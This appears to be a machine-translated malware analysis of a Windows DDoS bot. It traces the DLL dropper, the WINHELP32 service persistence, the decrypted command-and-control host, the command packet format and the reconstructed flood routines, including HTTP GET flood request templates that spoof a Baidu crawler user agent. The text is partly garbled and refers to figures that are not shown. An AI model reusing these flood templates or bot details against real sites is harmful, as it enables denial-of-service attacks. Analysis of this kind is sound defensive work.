A DDoS sample under Windows.
Loading device
A 256_res.tmp file is released in the TEMP directory after the program is run
The file is then moved to the System32 directory and named Rasmedia.dll.
Delete the original file.
Loads the DLL file that starts the release and calls the install function exported by the DLL.
Rasmedia.dll
The function install will register the DLL as a service WINHELP32.
Specific as follows
After the service runs, there will be two threads open.
A thread is used to communicate with the remote server.
A thread copies itself into memory, and when it discovers that the image file is deleted, it copies itself again.
。
This function is used to implement circular write protection.
The other thread is used to communicate with the remote server, and the main process of its interaction is in the function startaddress.
The function begins by decrypting the remote server address fabao.309420.com:7002, which corresponds to an IP of 61.147.107.79. An IP address for Yangzhou, Jiangsu province.
After obtaining the current system information, the encryption is sent to the remote server.
The encryption algorithm is restored as follows:
The packets sent are as follows altogether 96 bytes.
The remote server's control package is then accepted.
The data structure is as follows:
command is the remote control command.
The Accack is the packet length and is also used as a judge of the attack.
Target_url is the target URL for the attack.
Port to attack the destination.
Attack_message is a custom attack data payload.
The command accepts commands such as remote command execution, downloading files, and so on, but it can be found that the main function or DDoS-based.
You can see here that the 0x41000001,0x32000004,0x32000001,0x31000005 is a compound instruction, and the broiler receives the command to perform several types of DDoS attacks against the target, and the remaining DDoS instructions each correspond to a DDoS attack.
The returned package is received here. This is a total of 228 bytes, at which time the data is in the encrypted state.
Decryption by the following function, you can find that the beginning of decryption data is 32000020, here is a DDoS, command. The attack target of this command
The Target_url field after continuing the decryption can be found to return a field for an attack target, which is http://code.moquta.com.
There are multiple attack patterns in the provided DDoS attack strategy, which is a 32000020 example of a DDoS attack via an HTTP GET request that has already written a template in the code, as follows: Just fill in the Target,host and Refere.
You can see that this mode selects the Port field specified by the V1 offset 208, which defaults to 80.
You can see here our return package that offsets to 0x50 (more than one 0 is the reason for decrypting the script).
The attack packet is sent here.
Attack packs in various ways
Where Rand is a random number generator.
0x31000001
Fun_createthread_sockrandipsend
send_package{
Gerneration with 5byte 8 times
}
Length:40
One turn
0x31000002
Fun_createthread_sockheapsendto
package{
+2 cout (start with 0)
+6 0
+8 TickCount
}encrypt_by_sub_10005480
Length = 4096
One turn 65534 package
0x41000001
Fun_createthread_sockrandtentimesendto
send_package{
BUF (Generation by Rand (97,122))
}
Length 30
One turn
Count% Sleep
0x31000005
Fun_createthread_sockrandsend
send_package{
BUF ((Byte) generation by Rand (0,255) <<16)
}
Length 1024
One turn all the time
Fun_createthread_sockconnect1
send_package{
Connect
}
One Ture one package
Then sleep
Fun_createthread_sockconnect2
send_package{
Connect
}
One turn package connect and close
0x37000001
Fun_createthread_sockendcontainsend
send_package{
BUF (command_package[212,228])
}
Length 16
One turn all the time
0x33000001
Fun_creathethread_sockrandwithcountsend
send_package{
BUF (#%d<<<<<i@c<<<<<%s! count,generation with Rand (65,122))
}
Length rand (20,120)
One turn 6500
0x31000003
Fun_callback_sockrandthousandtimesendto
send_package{
BUF ((int) (Generation with Rand (97,122) <<16) *512*4)
}
length:2048
One turn
0x32000004
Fun_createthread_socksend_withoutref_httpone
send_package{
80
' GET%s?=%d http/1.1 '
' User-agent:mozilla/5.0 (compatible; baiduspider/2.0; +http://www '
'. baidu.com/search/spider.html) '
' Host:%s '
' Cache-control:no-cache '
' Mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/s '
' earch/spider.html)
GET%s?=%d http/1.1 '
' User-agent:mozilla/5.0 (compatible; baiduspider/2.0; +http://www '
'. baidu.com/search/spider.html) '
' Host:%s:%d '
' Cache-control:no-cache '
}
Length:buff
One turn all the time
0x32000001
Fun_createthread_socksend_withoutref_httptwo
send_package{
80
' get/http/1.1 '
' Host:%s '
' User-agent:mozilla/5.0 (compatible; baiduspider/2.0; +http://www '
'. baidu.com/search/spider.html) '
' Cache-control:no-cache '
' Connection:close '
For other port
' get/http/1.1 '
' Host:%s:%d '
' User-agent:mozilla/5.0 (compatible; baiduspider/2.0; +http://www '
'. baidu.com/search/spider.html) '
' Cache-control:no-cache '
' Connection:close '
}without_referer
Length:buff
One turn all the time
0x32000001
Fun_createthread_socksend_onlyhost_http
send_package{
80
' get/http/1.1 '
' Host:%s '
For other port
' get/http/1.1 '
' Host:%s:%d '
}
Length:buf
One turn all the time
0x36000001
Fun_createthread_socksend_withref_httpone
send_package{
80
' GET%s http/1.1 '
' Host:%s '
' User-agent:mozilla/5.0+ (compatible;+baiduspider/2.0;++http://www '
'. baidu.com/search/spider.html) '
' Cache-control:no-store, Must-revalidate '
' referer:http://%s '
' Connection:close '
For other port
' GET%s http/1.1 '
' Host:%s:%d '
' User-agent:mozilla/5.0+ (compatible;+baiduspider/2.0;++http://www '
'. baidu.com/search/spider.html) '
' Cache-control:no-store, Must-revalidate '
' referer:http://%s '
' Connection:close '
}
Length:buff
One turn all the time
0x32000002
Fun_createthread_socksend_withref_httptwo
send_package{
80
' GET%s http/1.1 '
' Host:%s '
' User-agent:mozilla/5.0 (compatible; baiduspider/2.0; +http://www '
'. baidu.com/search/spider.html) '
' Cache-control:no-store, Must-revalidate '
' referer:http://%s '
' Connection:close '
For other port
' GET%s http/1.1 '
' Host:%s:%d '
' User-agent:mozilla/5.0 (compatible; baiduspider/2.0; +http://www '
'. baidu.com/search/spider.html) '
' Cache-control:no-store, Must-revalidate '
' referer:http://%s '
' Connection:close '
}
Length:buf
One turn all the time
A DDoS sample under Windows